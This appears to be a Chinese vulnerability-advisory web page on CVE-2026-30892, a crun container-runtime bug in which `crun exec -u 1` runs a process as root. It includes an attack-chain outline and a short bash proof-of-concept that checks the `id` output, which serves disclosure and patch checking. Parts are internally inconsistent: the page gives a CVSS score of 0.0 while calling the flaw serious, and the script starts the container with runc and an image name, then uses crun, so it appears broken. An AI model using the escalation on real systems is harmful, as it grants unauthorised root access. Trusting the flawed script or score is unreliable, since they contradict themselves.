IPBUF安全漏洞报告
English
CVE-2026-30892 CVSS 0.0 低危

CVE-2026-30892 crun容器权限提升漏洞

披露日期: 2026-03-26
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-30892
漏洞类型
权限提升
CVSS评分
0.0 低危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
crun

相关标签

crun容器安全权限提升解析错误CVE-2026-30892

漏洞概述

crun是一个完全用C语言编写的开源OCI容器运行时。在1.19至1.26版本中,`crun exec`命令的`-u`(--user)选项存在严重的解析逻辑错误。当用户指定参数值为`1`时,程序错误地将其解释为UID 0和GID 0(即root权限),而非预期的UID 1和GID 0。这导致容器内进程以高于预期的特权运行,构成潜在的安全风险。该漏洞已在1.27版本中修复。

技术细节

该漏洞的核心原因在于crun在处理`crun exec`命令的`-u`(--user)参数时存在解析逻辑错误。在受影响版本(1.19至1.26)中,当用户尝试指定用户ID为`1`时,程序未能正确识别该数值,而是错误地将其解析为UID 0和GID 0,即root用户身份。这种错误的映射导致执行进程的权限远高于预期。攻击者利用此漏洞,只需在执行命令时添加`-u 1`参数,即可在目标容器内获得root权限。尽管攻击向量被标记为本地(AV:L)且需要具备执行crun的权限,但在多租户容器环境或CI/CD流水线中,这种非预期的权限提升可能被利用来逃逸限制或篡改关键数据,严重威胁容器运行时的安全性。

攻击链分析

STEP 1
步骤1
攻击者获得对目标系统的本地访问权限,并能够操控容器运行时命令。
STEP 2
步骤2
攻击者执行`crun exec`命令,并指定`-u 1`参数,意图以UID 1身份运行进程。
STEP 3
步骤3
受影响版本的crun错误地将参数`1`解析为UID 0(root)。
STEP 4
步骤4
恶意进程在容器内以root权限执行,实现权限提升。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2026-30892: crun Incorrect User Parsing # Description: This script demonstrates the privilege escalation vulnerability # where crun exec -u 1 incorrectly resolves to UID 0 (root). CONTAINER_NAME="crun_test_poc" IMAGE="ubuntu:latest" # Check if crun is installed if ! command -v crun &> /dev/null; then echo "crun is not installed. Exiting." exit 1 fi # Start a dummy container in the background echo "[+] Starting container..." runc run -d $CONTAINER_NAME $IMAGE sleep 3600 # Attempt to execute with UID 1 # Expected behavior: UID 1 (daemon) # Vulnerable behavior: UID 0 (root) echo "[+] Testing 'crun exec -u 1 ...'" crun exec -u 1 $CONTAINER_NAME id # Cleanup echo "[+] Cleaning up container..." crun delete -f $CONTAINER_NAME echo "[+] PoC completed. Check the 'id' output above." echo " If 'uid=0(root)', the system is vulnerable." echo " If 'uid=1(daemon)', the system is patched."

影响范围

crun 1.19
crun 1.20
crun 1.21
crun 1.22
crun 1.23
crun 1.24
crun 1.25
crun 1.26

防御指南

临时缓解措施
建议用户立即检查crun版本,并将受影响的环境升级至1.27或更高版本。若暂时无法升级,应严格限制能够执行`crun exec`命令的用户权限,避免使用`-u`参数进行用户切换,并监控容器内的异常提权行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表